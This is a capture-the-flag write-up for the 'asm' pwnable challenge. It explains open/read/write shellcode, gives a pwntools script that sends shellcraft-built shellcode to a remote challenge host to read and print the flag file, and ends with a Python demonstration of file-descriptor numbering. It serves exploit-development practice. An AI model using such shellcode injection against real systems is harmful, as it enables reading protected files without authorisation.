pwnable_asm
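Check the protections
Reading the flag with ORW is enough. The program creates a 0x1000-byte region at 0x41414000; we can read the flag into it and then print it.
ORW simply means open, read, write:
open(file='flag', oflag=0, mode=0);
read(3, 0x41414000, 0x100)
write(fd=1, buf=0x41414000, n=0x100)
In other words: open flag, read flag into 0x41414000, then write the data at 0x41414000 to the screen.
This can simply be written in assembly; for this challenge you can use pwntools' built-in open, read and write directly to get the flag.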
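from pwn import *

context(arch='amd64', os='linux', log_level='debug')
file_name = './z1r0'

debug = 1  # 1: connect to the remote instance, 0: run the local binary
if debug:
    r = remote('node4.buuoj.cn', 29493)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    # Attach gdb to the target process (local runs only)
    gdb.attach(r)

offset = 0x41414000  # region created by the program (0x1000 bytes)

shellcode = ''
shellcode += shellcraft.open('flag')             # open('flag', oflag=0, mode=0)
shellcode += shellcraft.read(3, offset, 0x100)   # fd 3: first descriptor after stdin/stdout/stderr
shellcode += shellcraft.write(1, offset, 0x100)  # write the buffer to stdout (fd 1)
print(shellcode)

shellcode = asm(shellcode)
r.sendline(shellcode)
r.interactive()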
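The read(3, ...) above relies on open() returning descriptor 3, which holds only when nothing besides stdin, stdout and stderr is open. The following is an added example, not part of the original write-up: it mirrors the three calls with Python's os module on a constructed sample file and shows that the kernel always hands out the lowest free descriptor number. The helper names and the sample file are assumptions made for illustration.

```python
import os
import tempfile

def orw(path, count=0x100, out_fd=None):
    """Mirror open(path, O_RDONLY), read(fd, buf, count), write(out_fd, buf, n)."""
    fd = os.open(path, os.O_RDONLY)       # oflag=0 is O_RDONLY
    try:
        data = os.read(fd, count)         # returns at most `count` bytes
    finally:
        os.close(fd)
    if out_fd is not None:
        os.write(out_fd, data)            # out_fd=1 is stdout
    return fd, data

def lowest_free_fd_demo(path):
    """open() returns the lowest unused descriptor, so its number
    depends on what the process already has open."""
    first = os.open(path, os.O_RDONLY)
    second = os.open(path, os.O_RDONLY)   # a different, higher number
    os.close(first)                       # frees the lower slot
    reused = os.open(path, os.O_RDONLY)   # the freed number is handed back
    os.close(second)
    os.close(reused)
    return first, second, reused

def make_sample():
    # Constructed sample file standing in for the challenge's "flag" file.
    f = tempfile.NamedTemporaryFile(delete=False, suffix=".flag")
    f.write(b"constructed{sample_flag_contents}\n")
    f.close()
    return f.name

if __name__ == "__main__":
    path = make_sample()
    fd, _ = orw(path, out_fd=1)
    print("open() returned fd", fd)
    print("first, second, reused =", lowest_free_fd_demo(path))
    os.unlink(path)
```

If the target process holds extra descriptors when the payload runs, the hardcoded 3 reads from the wrong file; using the value open() actually returned avoids that assumption.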